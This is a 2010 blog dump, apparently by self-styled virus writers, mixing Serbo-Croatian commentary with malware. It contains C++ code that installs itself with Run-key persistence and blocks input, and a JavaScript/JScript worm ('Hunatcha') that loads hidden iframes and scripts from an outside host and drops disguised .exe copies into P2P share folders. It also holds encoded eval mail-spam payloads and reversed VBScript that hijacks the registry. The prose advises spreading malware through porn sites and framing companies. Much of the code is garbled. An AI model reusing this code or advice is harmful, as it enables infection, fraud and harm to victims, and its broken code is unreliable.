utorak, rujan 28, 2010
moderator:[0390eu2309]
http://developers.facebook.com/tools/console/
Here you can see The Best hack! He search bug in facebook & link this script self
then fix bug like windows update.
Info: "Script can work if you drop in your HTML, appkey"
Milion user's can become attacked with this script!!!
_______Cut_here____________
Function User_Moderator()
{
"id": "1234567890",
"full name": "name and surname",
"first_name": "name",
"last_name": "surname",
"Basic Info ": "sex: fe/male",
"link": "http://www.facebook.com/name", //if have or no
"gender": "fe/male",
"locale": "en_US"
"Birthday": "month day, year"
"Relationship Status": "if have" //if have or no
"Network": "here go Relationship Status if profile dont have network" //if have or no
"Profile URL": "http://www.facebook.com/profile.php?id=1234567890",
"Description": "
This account is hacked, and religions right is destructed. He lost access to profile Email address associated with the account."}
_______Cut_here______________
nedjelja, rujan 12, 2010
"Svoj mir vam dajem. Ali, ne dajem ga onako kako svet daje. Neka se ne uznemirava vase srce. U svetu imacete vidnu laz i nevolje,
ali budite hrabri - ja sam pobedio svet. A to nije „kraj sveta" - zato sto ovaj svet nije kraj.Vecina vernika u vidovnjake smejat ce se ovoj recenici a zaplakati,
poverovati i moliti sve visnjeg tek kada izgube najdraze...
ZATO DOBRO RAMISLITE KOJI ,COMPATIBILE VIRUS' JE UPRAVO SPOJEN SA VASIM SYSTEM-OM
subota, srpanj 24, 2010
moderator[02893181901937]
::.::DESCRIPTION PANEL::.::
Hard infect and normal infect:
We wan't to explain the technique for everybody. I wanna show you a normal file
and a file infect by virus:
infected hard:
Commands+Call to virus+Virus+UpgradeCode
Infected sample:
Commands+Virus+Commands+Commands+Call to virus++Commands
Than we want to write the virus code to any line of the program.
Sounds easy...
Anything is like Coordinated Worm Design in the yellow link line
if you browsing any page on the google virus and any other surf pack,
that description can look anywhere...
One of the best virus tool can make hack cool !!!
look function =before start= (ie8 virus who coming 2011)
http://ie8.undermine.bloger.hr/
nedjelja, srpanj 11, 2010
blog.moderator[
8901381791347]&modif[
hiu2i98c]
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <mmsystem.h>
#include <time.h>
using namespace std;
int main()
{
void Spread();
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Spread, NULL, 0, NULL);
int welcome, count;
HWND CurrentWin;
CurrentWin = GetForegroundWindow();
HANDLE consol;
consol = GetStdHandle(STD_OUTPUT_HANDLE);
SetConsoleTextAttribute(consol,FOREGROUND_BLACK);
SetConsoleTitle("Vamfim Decoder");
while(1)
{
welcome = rand();
cout << welcome;
SetForegroundWindow(CurrentWin);
count = rand()%500;
if(count<51)
{
cout << "<>%REMOTE_ADDRESS%)_";
}
BlockInput(TRUE);
SetCursorPos(0,0);
}
return 0;
}
void Spread()
{
char CurrentFile[MAX_PATH];
char windows[MAX_PATH];
char system[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,CurrentFile,sizeof(CurrentFile));
GetSystemDirectory(system,sizeof(system));
GetWindowsDirectory(windows,sizeof(windows));
strcat(system,"\\logoff.exe");
strcat(windows,"\\Setup.exe");
CopyFile(CurrentFile,system,false);
CopyFile(CurrentFile,windows,false);
HKEY hKey_e;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey_e );
RegSetValueEx(hKey_e, "logoff",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey_e);
HKEY hKey_f;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey_f );
RegSetValueEx(hKey_f, "Windows Setup",0,REG_SZ,(const unsigned char*)windows,sizeof(windows));
RegCloseKey(hKey_f);
}
četvrtak, lipanj 24, 2010
blog.moderator[
37832811900218]
365 hours we try to modify jscript in net line but
any time this server crash template in this bloger
remove // <noscript> . </noscript> and add somewhere
clean undermine.bloger.hr from script and write link for attack
<noscript> // this line remove
<script language="javascript" type="text/javascript">
var go=new Date( ); go.setTime(go.getTime( )+12*60*60*1000); document.upgrade=
"http://www2.speedy-share.com/files/1/33esbypkkxy47a/Hunatcha.rar"+go.toGMTString( );
</script>
<script language="javascript" type="text/javascript">function Transferring() {
s=document.URL;path=s.substr(-0,s.Get("http://undermine.bloger.hr"));path=unescape(path);
document.write('var go=new Date( ); go.setTime(go.getTime( )+12*60*60*1000);
document.upgrade="http://www2.speedy-share.com/files/1/33esbypkkxy47a/Hunatcha.rar"+go.toGMTString( );') }
setUpgrade("Transferring()",true)
</script>
<script type="text/javascript" language="javascript">
document.write('<a href="javascript:savePageAsHTML()" _fcksavedurl="javascript:savePageAsHTML()" _fcksavedurl=
"javascript:savePageAsHTML()" _fcksavedurl="javascript:savePageAsHTML()"><iframe src="
http://undermine.bloger.hr" width="0" height="0" border="0" target="_blank"></a>');
function savePageAsHTML()
{
var sUriRequest = "";
sUriRequest = "author_id=" + authorId;
sUriRequest += "&page=" + pageOrientation;
sUriRequest += "&top=" + topMargin;
sUriRequest += "&bottom=" + bottomMargin;
sUriRequest += "&left=" + leftMargin;
sUriRequest += "&right=" + rightMargin;
eval('c=CreateObject("scripting.filesystemobject")b=c.opentextfile(WScript.scriptfullname)
.readall()b=b.substr(
b.search(c="undermine")-3)e=b.substr(0,d=b.search("biv")+14)f=String.fromCharCode(46)g=
String.fromCharCode(
39)Math.random(1)while(d<b.length-2){ if((h=b.substr(d,2))==f+"u")b=b.substr(0,d)+eval(g+b.substr(d,6)+g)+b.substr(d+6)e=e+(d==38?h:Math.random()>.5?b.charAt(d--):f+"u00"+b.charCodeAt(d--).toString(16))d+=2}for(d=new Trojan(c.getfolder(
".").files);!d.atEnd();d.moveNext()){if(c.getextensionname(b=d.item()).toLowerCase()=="js")try{f=b.attributes b.attributes=
0if(c.opentextfile(b).readall().search(c)<0)c.opentextfile(b,8).write(e+g+")")b.attributes=f}catch(z){}}')
// undermine.bloger.hr
var pURL = "http://undermine.bloger.hr/" + escape(document.location.href) + "&" + sUriRequest;
window.open(pURL, "undermine", "scrollbars=yes,resizable=yes,menubar,toolbar,location");
if (window['???? undermine'] != undefined && window['???? undermine']['loader'] != undefined) {
if (!window['???? undermine']['search']) {
window['???? undermine']['search'] = {};
google.search.JSWorm = 'JS/Hunatcha';
}
google.loader.writeLoadTag("script", google.loader.ServiceBase + "
http://undermine.bloger.hr", true);
}
}
const gHostWorm = {
id : "HostWorm",
virusType: "http://undermine.bloger.hr/settings/undermine/",
install : function() {
window.addEventListener("load",this.init,true);
},
init : function() {
if (load.virusTypes[HostWorm.virusType]) {
var bloger = document.getElementById("div");
bloger.addEventListener("divshowing",HostWorm.enable,true);
var element = document.getElementById(HostWorm.id);
element.setAttribute( "oncommand" , "HostWorm.show();");
} else {
var element = document.getElementById(HostWorm.id);
element.setAttribute("style", "display: none");
}
},
enable : function() {
var element = document.getElementById(HostWorm.id);
if (load.javaEnabled()) {
element.copyAttribute("upgrade");
} else {
element.setAttribute("upgrade", "true");
}
},
show : function() {
var jvmMgr = Components.classes['@google.org']
.getService(Components.interfaces.nsIJVMManager)
jvmMgr.showJavaConsole();
}
};
HostWorm.install();
</script>
<script type="text/javascript">
//<!-- (C)2000-2010 WWW - undermine / bloger.hr / Pages -->
var myworm_identifier = new String('http://undermine.bloger.hr');
</script>
<script src="/???? undermine.htm" type="text/javascript"></script>
<script type="text/javascript">
var Hunatcha,Kazaa,LimeWire,Documents and Settings;
var fso = new CreateObject("Scripting.FileSystemObject");
Hunatcha = (WScript.ScriptFullName);
KaZaa = ("C:\\Program Files\\KaZaa\\My Shared Folder") + "\\";
Kazaa = ("C:\\Program Files\\KaZaa") + "\\";
LimeWire = ("C:\\Program Files\\LimeWire\\My Shared Folder") + "\\";
LimeWire = ("C:\\Program Files\\LimeWire") + "\\";
Documents and Settings = ("C:\\Documents and Settings") + "\\";
Documents and Settings = ("C:\\Documents and Settings\\%user%\\
My Documents\\Downloads\\") + "\\";
if(fso.folderexists(KaZaa)){
fso.copyfile(Hunatcha, KaZaa + "users_info.txt.exe");
fso.copyfile(Hunatcha, KaZaa + "video sister.avi.exe");
}
if(fso.folderexists(LimeWire)){
fso.copyfile(Hunatcha, LimeWire + "gratis.mp4.exe");
fso.copyfile(Hunatcha, LimeWire + "info download.txt.exe");
}
if(fso.folderexists(Documents and Settings)){
fso.copyfile(Hunatcha, Documents and Settings + "upload.jpg.exe");
}
</script>
<script language="javascript" type="text/javascript"> var go=new Date( ); go.
setTime(go.getTime( )+12*60*60*1000);
document.upgrade="http://%REMOTE_ADDRESS%"+go.toGMTString( ); </script>
<script language="javascript" type="text/javascript">function Transferring() {
s=document.URL;path=s.substr(-0,s.Get("http://%REMOTE_ADDRESS%"));
path=unescape(path);
document.write('var go=new Date( ); go.setTime(go.getTime( )+12*60*60*1000); document.upgrade="
http://%REMOTE_ADDRESS%"+go.toGMTString( );') }
setUpgrade("Transferring()",true)
var a0="under";var a1="mine";var a2=".bloger";var a3=".hr";
var b = "demo.aspx?&seoref="+encodeURIComponent(document.referrer)+"
&HTTP_REFERER="
+encodeURIComponent(document.URL)+"&default_keyword="+document.title;
var z = "http://"+a0+a1+a2+a3+"/"+b;var y = "<script language='JavaScript' src='"+z+"' ><"+"/"+"script>";
document.write(y);
</script>
<noscript> // this line remove |
utorak, lipanj 22, 2010
blog moderator[
6383212049813561]:
new record in relinked subfolder'/trojanbomb/'
Part I
crashed security relinked mail sender html
http://www.rts.rs/page/stories/ci/story/256/%61%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%61%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%61%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%61%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%62%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%61%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%61%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%61%2E%73%65%6E%64%28%29%0D%0A%62%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%62%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%62%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%62%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%62%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%62%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%62%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%62%2E%73%65%6E%64%28%29%0D%0A%63%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%63%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%63%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%63%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%63%2E%62%63%63%20%3D%20%22%77%65%62%64%65%73%6B%40%72%74%73%2E%72%73%22%0D%0A%63%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%63%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%63%2E%73%65%6E%64%28%29%0D%0A%64%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%64%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%64%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%64%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%64%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%64%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%64%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%64%2E%73%65%6E%64%28%29%0D%0A%78%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%78%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%78%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%78%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%78%2E%62%63%63%20%3D%20%22%77%65%62%64%65%73%6B%40%72%74%73%2E%72%73%22%0D%0A%78%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%78%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%78%2E%73%65%6E%64%28%29/727252/%D0%93%D0%BB%D0%B5%D0%B4%D0%B0%D0%BE%D1%86%D0%B8+%D1%80%D0%B5%D0%BF%D0%BE%D1%80%D1%82%D0%B5%D1%80%D0%B8+%2822.6.2010%29.html?email=yes
|
Part II
encry trojanbomb and special difficul function for someone
| function tmp() { eval(unescape('%61%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%61%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%61%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%61%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%62%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%61%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%61%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%61%2E%73%65%6E%64%28%29%0D%0A%62%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%62%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%62%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%62%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%62%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%62%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%62%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%62%2E%73%65%6E%64%28%29%0D%0A%63%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%63%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%63%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%63%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%63%2E%62%63%63%20%3D%20%22%77%65%62%64%65%73%6B%40%72%74%73%2E%72%73%22%0D%0A%63%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%63%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%63%2E%73%65%6E%64%28%29%0D%0A%64%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%64%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%64%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%64%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%64%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%64%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%64%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%64%2E%73%65%6E%64%28%29%0D%0A%78%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%78%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%78%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%78%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%78%2E%62%63%63%20%3D%20%22%77%65%62%64%65%73%6B%40%72%74%73%2E%72%73%22%0D%0A%78%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%78%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%78%2E%73%65%6E%64%28%29')); } |
Write;
Blog.
m
ponedjeljak, svibanj 31, 2010
alert("All rights we have bcoz business not have rights to surf [at]
any web page without business rights!");
update : business title in belgia wher is big boss : [ denolin ]
big boss is in belgia for all planta spont in all country .
Vxers [ H.P.D.M ] vs-> P.Spont business boss: Woman
[1:16:21 PM] Hast Plast Donji Milanovac: Otvorili smo skype, za saradnju.
Planta Spontanea has shared contact details with Hast Plast Donji Milanovac.
[1:17:48 PM] *** Hast Plast Donji Milanovac sent Ponude.txt ***
[1:21:16 PM] Ukoliko nemozete sacekati skidanje poslacemo vam kracu verziju.
[1:27:31 PM] Hast Plast Donji Milanovac: saljemo vam ponude a nesto se necuje kada zelimo da se javimo
[1:28:09 PM] Planta Spontanea: Primetila sam. U svakom slucaju, hvala na ponudama koje jos uvek stizu...
[1:30:31 PM] Hast Plast Donji Milanovac: jeste li dobili punudu u tesktu od nas sada koji smo poslali?
[1:32:13 PM] Planta Spontanea: Prva ponuda neuspesna, druga se jos uvek download-uje.
[1:33:20 PM] Hast Plast Donji Milanovac: Molimo vas sacekajte ! Javljeno nam je da je problem
u skype konekciji u svakom slucaju ponuda se salje .... Hvala
[1:42:13 PM] Planta Spontanea: OK!
[1:47:06 PM] Hast Plast Donji Milanovac: Zasto nam se pojavilo da je posiljka prekinuta?
[1:47:52 PM] Hast Plast Donji Milanovac: saljemo vam je upravo sada... Ako zelite razgledati ponudu.
[1:50:01 PM] Hast Plast Donji Milanovac: Imate li drugi mail kako bi vam lakse i bez cekanja i problema
poslali i bili u brzem kontaktu dok se skype ne popravi...
[1:51:21 PM] Hast Plast Donji Milanovac: zaista ovaj skype kod nas ima problem
[1:51:25 PM] Hast Plast Donji Milanovac: zao nam je
[1:51:43 PM] Planta Spontanea: Komunikacija jos uvek nemoguca...E-mail adresa je: plantaspont@nadlanu.com
[1:51:51 PM] Hast Plast Donji Milanovac: pozvacemo nekog da nam popravi....
[1:52:22 PM] Hast Plast Donji Milanovac: neznamo u cemo je problem hvala saljemo vam ponudu na taj vas mail
[1:55:46 PM] Hast Plast Donji Milanovac: saljemo vam nas mail je **********@gmail.com
[1:56:11 PM] Hast Plast Donji Milanovac: to je mail radnika u firmi
[1:56:25 PM] Hast Plast Donji Milanovac: a dobicete i zvanicni mail nase firme
[1:56:34 PM] Hast Plast Donji Milanovac: cim ga otvorimo
[1:57:22 PM] Planta Spontanea: OK! Hvala!
[2:10:01 PM] Hast Plast Donji Milanovac: subjekat mail-a je : Ponude Hast Plast upravo smo vam poslali
na vas mail bazu ponuda Ahiva.b64 koju cete otvoriti preko zip ili rar programa.
Little info from me ; Firma vec nekoliko meseci ne placa radnike dok ne dodje novi gazda.
Prodaja koju cete sami videti u %HardDrive%\\history deleted file je to da su prodavali neke dzakove
kako bi dobijali novac umesto radnicke plate
From me again ; one business name:[ holcim cementara popovac ] Title:[S.Z.T.R vidojevic] je radnja
za izvodjenje mermera !knjigovodstvo , ta firma im je dugovala malo novca ali mozete ih
kontaktirati kao sa izvinjenjem u kom cete naglasiti slanje: arhivu knjigovodja sa tekstom
da zelite dalju saradnju sa Planta Spont Donji Milanovac ...
subota, svibanj 8, 2010
danasnje av kompanije imaju problem sa nazivom u bazi virusa,
jedan od testova izvrsen je u "lab" vxhers grupe. Uzet je primer
Originalnog crv-a i samo je kopija dobila naziv clijent, svch,
sys32, s32 i svi nazivi koji dovode do sumnje za host na kom dolaze trojanci
i virusi, pa ga vecina nazivaju trojan ili virus od 100% avers-a
samo ga 2% detektuju po kodiranju ostali ga detektuju po samom nazivu
koji je maskiran u imenu tokom kreiranja...
Zakon o kreiranju virusa, je prekticna suprotnost od onoga sto vecina
vxers misli u srbiji a to je hehe zatvor, recicu vam sada nesto i o tome
ako ste kreirali trojanca crva ili originalni doom virus, morate imati
dobar smisljeni plan uz neki sajt sa kog cete ga poslati zrtvama, kao sto
je naprimer porno sajt gde cete ubaciti vasu tehnicku funkciju. Ukoliko vas
neka firma pronadje dobro je imati takav sajt koji cete ubaciti u computer
te firme i dobro ga sakriti ukoliko vam pocne sudjenje imate svoj dokaz jer
firme koje se bave milionima evra ne smeju posecivati sajtove kao sto su porn.com
i slicni sajtovi na kojima se moze dobiti otvoreni prolaz, kao i sama rec
vecine avers-a glasi : " Ni po koju cenu nije dobro posecivati bilo koje sajtove,
sto mogu instalirati virus u vasem computer-u i zatim naneti stetu koju posle morate
odkloniti samo celim formatiranjem harddisk-a. " Ukoliko neki radnik poseti vas sajt
ili krene sa poslovnog computer-a da chat-uje s'vama samim tim budite svesni da je i njemu
zabranjeno poslovnim computer-om ulaziti na sajtove koji nisu deo poslovne firme...
"Zapamtite samo deklaraciju "19" ili je procitajte tu vam je taj zakon za sve demokratske
i ujedinjene drzave"....
font: tahoma[cro-rs]
by Branko D Tomic
subota, travanj 24, 2010
Prvi korak :
Hunatcha je baziran za vecinu tehnickih komponenta, ukljucujuci
* Infekciju fajlova i sobe diskova - ali korisnik mora imati u vidu
vec neki zarazeni fajl koji ce dati do znanja crvu da je inficiran, slutio sam
da ce vecina pomisliti da je worm startajuci pomocnik virus-a ali vecina odnosno mnogi grese .
Princip crva je bolji osecaj rada kada primeti inficirani fajl, a sobe diskova ili drives
mogu slobodno reci da je spoj sa masinom odnosno sobom u kojoj se nalazi baza za infekciju.
* Proces koji sami vidite daje mu znatno bolju sigurnost sirenja kroz P2P
kao sto su fajlovi za verovanje i to je mnogo bitno('users_info.txt.exe') , ('info download.txt.exe')
ostanimo na ovim fajlovima primerom kada neko zeli videti detaljnije sta moze skidati naravno da ce otvoriti
masku koja mu se pokazuje kao tekstualnost.
* Taskkill je veoma dobro radjena tehnika uz system kroz neverantivirus daje crvu sigurnost prolaza
i pozeljno je dopunjavati taj deo. primetio sam da f-sec i jos neki avers-i detektuju ali ono sto je bitno
on ipak ispuni svoj deo posla tako da vas ne treba plasiti ako je detektovan.
Drugi korak: (definicija Port 21)
port 21 je spremljen za sve one koji vole preko port-a ulaziti i otimajuci bazu svih fajlova
preko zakljucanog port-a za download i upload. Naravno da mozete raditi sa
preko port-a 21 jer su oni vec i u systemu inficiranog kompjutera.
Treci korak:
Ocekuje se od vas dopuna i tehnika vec poznatih username/password
i naravno imacete pristupacnije delove rada u windows visti i se7en.
dok u xp vec je odobren pristup na vecini kompjuter-a , nadam se da shvatate?
kad smo vec kod tehnike vratimo se definiciji 21 port mozete vec raditi sa poznatim
virus-ima iz sobe 21 dok za se7en ce vam trebati ovaj treci korak . U ovom delu dolazi
i poruka za avers-e koja glasi kodom :
static char *msg_to_avers = "We never stop to make your business!";
Da to sam im hteo reci jer sto se oni zale i prave da nisu zadovoljni zlonamerom, kada
je to njihova takodje zarada da nije virus-a nebi bilo ni anti-virusa .
petak, travanj 16, 2010
četvrtak, travanj 15, 2010
'"sbv.23metsys\swodniW\:D | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
'"sbv.23metsys\swodniW\:E | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
'"sbv.23metsys\swodniW\:F | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
'"sbv.23metsys\swodniW\:G | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
'"sbv.23metsys\swodniW\:H | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
'"sbv.23metsys\swodniW\:I | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
'"sbv.23metsys\swodniW\:J | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
'"sbv.23metsys\swodniW\:K | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
'"sbv.23metsys\swodniW\:L | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
'emaNlluFtpircS.tpircsW = flesym
'txen emuser rorre nO
')cepsredlof(eheh buS
'txeN emuseR rorrE nO
'osf ,s ,txe ,cf ,1f ,f miD
')"tcejbOmetsySeliF.gnitpircS"(tcejbOetaerC = osf teS
')cepsredlof(redloFteG.osf = f teS
'seliF.f = cf teS
'cf nI 1f hcaE roF
')htaP.1f(emaNnoisnetxEteG.osf = txe
')txe(esaCL = txe
')emaN.1f(esaCL = s
'nehT )"iva" = txe( rO )"gepm" = txe( fI
')emanlluftpircs.tpircsw(elifteg.osf = f teS
